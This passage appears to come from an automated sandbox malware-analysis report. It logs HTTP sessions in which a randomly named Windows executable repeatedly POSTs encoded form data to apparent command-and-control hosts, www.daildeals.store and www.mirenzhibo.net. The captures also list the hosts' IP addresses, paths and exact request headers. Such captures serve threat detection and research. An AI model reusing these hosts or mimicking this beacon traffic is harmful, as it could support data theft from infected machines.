                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                            Dec 16, 2024 22:04:22.543585062 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.549999209.74.79.41802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:04:28.082873106 CET832OUTPOST /4der/ HTTP/1.1
                                                            Host: www.daildeals.store
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.daildeals.store
                                                            Content-Length: 204
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.daildeals.store/4der/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 56 61 6b 6d 45 71 54 37 49 63 44 6a 58 76 74 46 4e 2f 78 45 79 78 57 30 6b 6b 61 63 6c 51 6f 55 4c 4a 6e 45 4b 2f 33 56 74 6f 6c 43 75 58 57 62 55 70 66 61 76 5a 35 4e 42 47 6e 4d 66 2b 4d 38 59 56 77 6d 41 68 78 30 6d 30 39 74 30 43 77 34 75 76 55 41 46 6e 30 59 48 43 69 78 61 44 78 32 5a 63 64 51 56 6f 64 39 53 42 41 30 59 66 4a 33 68 69 41 4d 35 69 49 35 58 47 61 4d 6e 55 78 57 4f 33 65 5a 67 6a 41 33 67 71 78 68 79 35 63 38 44 72 58 41 70 53 45 54 35 42 4e 72 79 50 78 35 42 4f 78 4f 56 30 48 48 57 50 5a 39 77 7a 6f 57 55 63 5a 69 79 52 30 6a 42 50 6d 73 36 33 76 47 5a 65 6c 67 71 51 49 3d
                                                            Data Ascii: glL=VakmEqT7IcDjXvtFN/xEyxW0kkaclQoULJnEK/3VtolCuXWbUpfavZ5NBGnMf+M8YVwmAhx0m09t0Cw4uvUAFn0YHCixaDx2ZcdQVod9SBA0YfJ3hiAM5iI5XGaMnUxWO3eZgjA3gqxhy5c8DrXApSET5BNryPx5BOxOV0HHWPZ9wzoWUcZiyR0jBPms63vGZelgqQI=
                                                            Dec 16, 2024 22:04:29.300947905 CET533INHTTP/1.1 404 Not Found
                                                            Date: Mon, 16 Dec 2024 21:04:29 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.550000209.74.79.41802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:04:30.745614052 CET852OUTPOST /4der/ HTTP/1.1
                                                            Host: www.daildeals.store
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.daildeals.store
                                                            Content-Length: 224
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.daildeals.store/4der/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 56 61 6b 6d 45 71 54 37 49 63 44 6a 55 4d 31 46 50 64 5a 45 35 78 57 33 72 45 61 63 77 67 6f 59 4c 4a 62 45 4b 37 48 46 75 65 56 43 74 32 6d 62 56 73 2f 61 6f 5a 35 4e 56 32 6e 4a 42 4f 4d 33 59 56 74 46 41 67 4e 30 6d 30 5a 74 30 44 41 34 75 63 38 44 46 33 31 2b 50 69 69 33 56 6a 78 32 5a 63 64 51 56 6f 4a 58 53 42 34 30 62 72 4e 33 67 41 34 50 6c 53 49 32 51 47 61 4d 6a 55 77 66 4f 33 66 4b 67 69 63 4e 67 76 39 68 79 38 67 38 44 36 58 48 69 53 45 76 33 68 4d 67 6a 64 74 79 4f 76 74 6b 50 56 4b 32 57 75 5a 4c 34 6c 5a 38 4f 2b 52 4b 68 78 59 62 52 63 75 62 72 48 4f 76 44 39 31 51 30 48 64 35 68 37 57 67 63 79 73 6e 37 67 6a 7a 78 30 76 44 78 34 56 52
                                                            Data Ascii: glL=VakmEqT7IcDjUM1FPdZE5xW3rEacwgoYLJbEK7HFueVCt2mbVs/aoZ5NV2nJBOM3YVtFAgN0m0Zt0DA4uc8DF31+Pii3Vjx2ZcdQVoJXSB40brN3gA4PlSI2QGaMjUwfO3fKgicNgv9hy8g8D6XHiSEv3hMgjdtyOvtkPVK2WuZL4lZ8O+RKhxYbRcubrHOvD91Q0Hd5h7Wgcysn7gjzx0vDx4VR
                                                            Dec 16, 2024 22:04:31.966398954 CET533INHTTP/1.1 404 Not Found
                                                            Date: Mon, 16 Dec 2024 21:04:31 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.550001209.74.79.41802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:04:33.424006939 CET1869OUTPOST /4der/ HTTP/1.1
                                                            Host: www.daildeals.store
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.daildeals.store
                                                            Content-Length: 1240
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.daildeals.store/4der/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 56 61 6b 6d 45 71 54 37 49 63 44 6a 55 4d 31 46 50 64 5a 45 35 78 57 33 72 45 61 63 77 67 6f 59 4c 4a 62 45 4b 37 48 46 75 64 31 43 74 41 61 62 55 4e 2f 61 70 5a 35 4e 4a 6d 6e 49 42 4f 4d 51 59 56 31 5a 41 67 41 50 6d 32 78 74 75 68 34 34 6e 4e 38 44 4b 33 31 2b 44 43 69 32 61 44 78 76 5a 63 4e 63 56 6f 5a 58 53 42 34 30 62 74 68 33 77 69 41 50 32 43 49 35 58 47 61 41 6e 55 78 32 4f 33 47 2f 67 69 59 6e 67 62 42 68 79 64 51 38 4f 6f 2f 48 76 53 45 70 6e 78 4e 67 6a 64 67 71 4f 76 78 43 50 56 2b 51 57 70 74 4c 37 54 45 6e 54 76 6b 58 2f 6e 56 2f 63 37 58 36 30 53 32 78 4e 72 35 62 78 6c 6c 62 6f 4b 66 43 53 45 67 5a 35 6a 6d 45 7a 52 76 41 38 2f 30 77 46 62 78 79 4f 56 4d 76 6d 45 74 30 49 32 57 53 77 6b 6c 77 2b 76 32 4e 53 36 41 78 65 41 41 78 35 53 57 39 51 4e 70 47 70 50 54 65 6e 4a 4c 42 2f 71 50 35 4e 51 7a 6f 4a 69 6c 66 31 51 4f 63 57 50 52 78 34 4f 4f 61 50 4a 64 44 69 62 35 42 75 6e 43 37 38 41 53 66 31 58 55 73 75 61 69 44 52 77 70 48 5a 42 33 43 4f 52 30 66 32 56 65 54 54 6d [TRUNCATED]
                                                            Data Ascii: glL=VakmEqT7IcDjUM1FPdZE5xW3rEacwgoYLJbEK7HFud1CtAabUN/apZ5NJmnIBOMQYV1ZAgAPm2xtuh44nN8DK31+DCi2aDxvZcNcVoZXSB40bth3wiAP2CI5XGaAnUx2O3G/giYngbBhydQ8Oo/HvSEpnxNgjdgqOvxCPV+QWptL7TEnTvkX/nV/c7X60S2xNr5bxllboKfCSEgZ5jmEzRvA8/0wFbxyOVMvmEt0I2WSwklw+v2NS6AxeAAx5SW9QNpGpPTenJLB/qP5NQzoJilf1QOcWPRx4OOaPJdDib5BunC78ASf1XUsuaiDRwpHZB3COR0f2VeTTmxTPpK+2J/sT+hsVjtugOH0uut6m7PJNiGcCBUKdiHrBf7O/mxwsNCiC0p8MhEISMNuRkj+04TXWn0ONFqKSWc9I00glNntbdIztcvvdESm//dlJdc3egPYB0Z/Mu1rGBES3hxbLgEVhEVliQzSvSC+Mb7oHcDfosBbvqMQgcysRmBc0IbWspmqDek37kvURdoFecojwhOViw7k+WHU69FJBIDCc2jQ0lfoUSN63b+IrerCWqSxHc7Fu7vBF/71mfr4UPQVd6OOBgFfJDPSgy74AowPt4Sl1JR6TP+rC9G8nAvxOX/REweKlAJcX2TN12dJcOF+Y4aeBJDFejaMBpDCNRisx15jKykoKsbX0DpbGXOJUzz/9NNDOCW7b0kZkL86AXRlE2q8UDy+oMS1aoJAXu9CyYEDYYjAGQ55BUpmiOKmyUT1RxitvDL/Cvwy+xB2Say16w5mbkyOIMogh9qdzHmspKOz8Qd2Wbxui3I6DnD5yXCKmaCnHdaU0BQ0hoBkhrAYUC2wnzRnotL/qPmeveE9MiFqatW1y88mJ5O+ufD6jt5zCFLVn6oH2C4EqGp1gGP+x+xrfBuCY7aGGtzbE3zxhh7wY5fj8N4gL8yv++LxaUjMrV7Tf3htJq5G9GluslZqcy2rDkoxpSxszHVj0NRS5wKfCkRs [TRUNCATED]
                                                            Dec 16, 2024 22:04:34.699951887 CET533INHTTP/1.1 404 Not Found
                                                            Date: Mon, 16 Dec 2024 21:04:34 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.550002209.74.79.41802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:04:36.077868938 CET567OUTGET /4der/?glL=YYMGHc7nB9HtOtUeBPVSxR+WmRqt9hwVJNfACr/+gthqhU+TX8+lmYNNDhSQdPk9Ul0tcTJBmGlE6igitsY0L34TIiyEVDNgetJ+DsRbDx0/KucqiDM9wQsuWEr/lXATQw==&UBE=olMPpNEHS HTTP/1.1
                                                            Host: www.daildeals.store
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Dec 16, 2024 22:04:37.299022913 CET548INHTTP/1.1 404 Not Found
                                                            Date: Mon, 16 Dec 2024 21:04:37 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.550003202.95.11.110802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:04:51.710653067 CET829OUTPOST /h075/ HTTP/1.1
                                                            Host: www.mirenzhibo.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.mirenzhibo.net
                                                            Content-Length: 204
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.mirenzhibo.net/h075/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 42 37 7a 50 71 30 68 50 43 47 68 6e 48 56 63 39 7a 76 4c 30 31 4f 55 6a 78 76 47 77 50 6e 45 61 48 4a 7a 38 51 58 75 4f 31 68 32 57 55 7a 35 42 6d 72 68 57 6d 33 6e 63 35 6b 4d 78 38 59 51 4a 35 2b 6f 48 38 61 4e 56 31 78 33 58 6c 74 4c 45 30 4c 34 4d 67 35 31 44 63 78 73 35 47 52 39 52 51 6e 38 45 4d 55 51 32 64 45 4f 38 36 46 58 43 79 4e 2b 76 76 35 52 4d 61 59 56 48 75 4d 43 4e 42 6c 34 51 4b 38 41 32 36 34 2f 58 64 73 6d 6f 64 36 71 37 4f 36 36 32 42 71 4d 31 5a 43 46 66 42 31 48 31 2b 58 46 42 68 67 63 4e 46 47 32 79 33 32 48 4c 51 30 2f 72 36 44 64 2b 76 59 32 51 64 38 36 32 53 43 34 3d
                                                            Data Ascii: glL=B7zPq0hPCGhnHVc9zvL01OUjxvGwPnEaHJz8QXuO1h2WUz5BmrhWm3nc5kMx8YQJ5+oH8aNV1x3XltLE0L4Mg51Dcxs5GR9RQn8EMUQ2dEO86FXCyN+vv5RMaYVHuMCNBl4QK8A264/Xdsmod6q7O662BqM1ZCFfB1H1+XFBhgcNFG2y32HLQ0/r6Dd+vY2Qd862SC4=
                                                            Dec 16, 2024 22:04:53.251081944 CET190INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Mon, 16 Dec 2024 21:04:52 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d404 Not Found0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.550004202.95.11.110802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:04:54.412866116 CET849OUTPOST /h075/ HTTP/1.1
                                                            Host: www.mirenzhibo.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.mirenzhibo.net
                                                            Content-Length: 224
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.mirenzhibo.net/h075/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 42 37 7a 50 71 30 68 50 43 47 68 6e 46 31 4d 39 2f 73 6a 30 69 2b 55 67 76 2f 47 77 42 48 45 65 48 4a 2f 38 51 54 2f 4c 31 53 53 57 55 53 4a 42 6c 6f 35 57 72 58 6e 63 78 45 4e 37 79 34 51 53 35 2b 55 6c 38 61 42 56 31 78 6a 58 6c 70 62 45 7a 38 55 4c 67 70 31 42 48 42 73 37 5a 68 39 52 51 6e 38 45 4d 55 55 63 64 45 6d 38 39 30 6e 43 67 59 53 75 73 35 52 4e 4e 6f 56 48 71 4d 43 4a 42 6c 34 2b 4b 39 4d 59 36 37 48 58 64 73 57 6f 61 72 71 34 46 36 37 2f 65 36 4e 34 63 77 73 62 5a 46 33 48 69 58 30 39 34 6a 42 35 41 77 48 59 74 55 50 6a 44 55 54 54 71 51 56 4a 2b 6f 58 35 48 66 71 47 4d 56 74 62 73 36 6b 61 2b 31 57 64 34 4e 78 4e 46 57 6b 58 6a 4e 36 6e
                                                            Data Ascii: glL=B7zPq0hPCGhnF1M9/sj0i+Ugv/GwBHEeHJ/8QT/L1SSWUSJBlo5WrXncxEN7y4QS5+Ul8aBV1xjXlpbEz8ULgp1BHBs7Zh9RQn8EMUUcdEm890nCgYSus5RNNoVHqMCJBl4+K9MY67HXdsWoarq4F67/e6N4cwsbZF3HiX094jB5AwHYtUPjDUTTqQVJ+oX5HfqGMVtbs6ka+1Wd4NxNFWkXjN6n
                                                            Dec 16, 2024 22:04:55.987349987 CET190INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Mon, 16 Dec 2024 21:04:55 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: d404 Not Found0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.550005202.95.11.110802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:04:57.073822021 CET1866OUTPOST /h075/ HTTP/1.1
                                                            Host: www.mirenzhibo.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.mirenzhibo.net
                                                            Content-Length: 1240
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.mirenzhibo.net/h075/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 42 37 7a 50 71 30 68 50 43 47 68 6e 46 31 4d 39 2f 73 6a 30 69 2b 55 67 76 2f 47 77 42 48 45 65 48 4a 2f 38 51 54 2f 4c 31 53 61 57 55 67 42 42 6e 49 46 57 6b 33 6e 63 79 45 4e 32 79 34 51 66 35 36 34 68 38 61 38 69 31 79 62 58 6c 4c 54 45 79 4e 55 4c 75 70 31 42 59 78 73 34 47 52 39 45 51 6d 4d 41 4d 55 6b 63 64 45 6d 38 39 32 2f 43 6a 4e 2b 75 71 35 52 4d 61 59 56 31 75 4d 43 74 42 6c 67 49 4b 39 49 6d 36 4b 6e 58 64 4d 47 6f 59 5a 79 34 47 61 37 39 64 36 4d 72 63 77 77 55 5a 47 43 38 69 58 77 44 34 6a 70 35 43 58 66 50 39 56 37 35 58 33 61 77 69 7a 74 32 75 65 65 65 46 73 4f 51 50 6c 4a 42 78 75 30 6d 78 67 36 34 77 64 30 44 52 41 6f 74 68 6f 72 47 57 33 6c 42 6f 43 4c 35 2b 4c 41 65 65 7a 4b 41 41 56 6d 4a 38 53 68 59 38 71 50 74 56 45 59 65 76 78 61 5a 70 56 56 64 34 6d 39 46 6b 41 4b 62 56 4d 59 53 75 64 30 49 36 6b 50 67 50 58 61 6a 6a 65 64 48 4b 72 55 6a 47 65 5a 43 50 54 51 44 2b 43 41 65 4f 72 37 73 7a 4e 6f 30 